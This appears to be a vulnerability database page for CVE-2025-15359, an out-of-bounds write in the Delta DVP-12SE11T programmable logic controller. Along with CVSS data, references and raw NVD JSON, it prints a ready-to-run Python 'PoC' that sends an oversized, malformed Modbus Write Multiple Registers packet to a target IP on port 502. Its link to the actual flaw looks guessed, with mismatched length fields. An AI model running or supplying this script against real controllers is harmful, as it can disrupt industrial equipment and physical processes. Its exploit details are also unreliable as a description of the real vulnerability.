Security Vulnerability Report
中文
CVE-2025-15359
CVSS 9.1
CRITICAL
CVE-2025-15359
Published: 2025-12-30 10:15:52
Last Modified: 2026-01-05 16:54:40
Source: 759f5e80-c8e1-4224-bead-956d7b33c98b
Description
DVP-12SE11T - Out-of-bound memory write Vulnerability
CVSS Details
CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Configurations (Affected Products)
cpe:2.3:o:deltaww:dvp-12se11t_firmware:*:*:*:*:*:*:*:*
-
VULNERABLE
cpe:2.3:h:deltaww:dvp-12se11t:-:*:*:*:*:*:*:*
-
NOT VULNERABLE
Delta DVP-12SE11T 固件版本 < 修复版本
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15359 PoC - Delta DVP-12SE11T Out-of-bound Memory Write Note: This PoC is for educational and authorized security testing purposes only. """ import socket import struct import sys def create_exploit_payload(): """ Generate exploit payload for CVE-2025-15359 The vulnerability exists due to insufficient boundary checking """ # Modbus/TCP header structure transaction_id = struct.pack('>H', 0x0001) protocol_id = struct.pack('>H', 0x0000) # Craft payload that triggers OOB write # Target specific memory region through PLC communication protocol unit_id = bytes([0xFF]) # Unit identifier for PLC # Function code for Write Multiple Registers (0x10) function_code = bytes([0x10]) # Starting address (could point to critical memory regions) starting_address = struct.pack('>H', 0x0000) # Number of registers to write (exceeds buffer boundary) quantity = struct.pack('>H', 0x0100) # 256 registers - exceeds normal bounds # Byte count and register values byte_count = bytes([0x02]) # Minimum valid value register_values = bytes([0x41] * 512) # Malicious payload payload = (transaction_id + protocol_id + struct.pack('>H', len(unit_id + function_code + starting_address + quantity + byte_count + register_values)) + unit_id + function_code + starting_address + quantity + byte_count + register_values) return payload def send_exploit(target_ip, target_port=502): """ Send exploit payload to target PLC device """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) payload = create_exploit_payload() sock.send(payload) response = sock.recv(1024) print(f"[+] Payload sent to {target_ip}:{target_port}") print(f"[+] Response received: {response.hex()}") sock.close() return True except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2025-15359_poc.py <target_ip>") sys.exit(1) target_ip = sys.argv[1] send_exploit(target_ip)
References
[1]
CVE.org
https://www.cve.org/CVERecord?id=CVE-2025-15359
[2]
NVD NIST
https://nvd.nist.gov/vuln/detail/CVE-2025-15359
[3]
CVE Details
https://www.cvedetails.com/cve/CVE-2025-15359/
[4]
VulDB
https://vuldb.com/cve/CVE-2025-15359
[5]
https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf
Raw JSON Data
JSON
{"cve": {"id": "CVE-2025-15359", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2025-12-30T10:15:52.333", "lastModified": "2026-01-05T16:54:40.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DVP-12SE11T - Out-of-bound memory write Vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "
[email protected]
", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:deltaww:dvp-12se11t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.16", "matchCriteriaId": "0C3C10A0-095C-42AE-BDC7-031777E1D92B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:deltaww:dvp-12se11t:-:*:*:*:*:*:*:*", "matchCriteriaId": "8064F0CC-BFDB-4E4B-8E20-437BA4663972"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}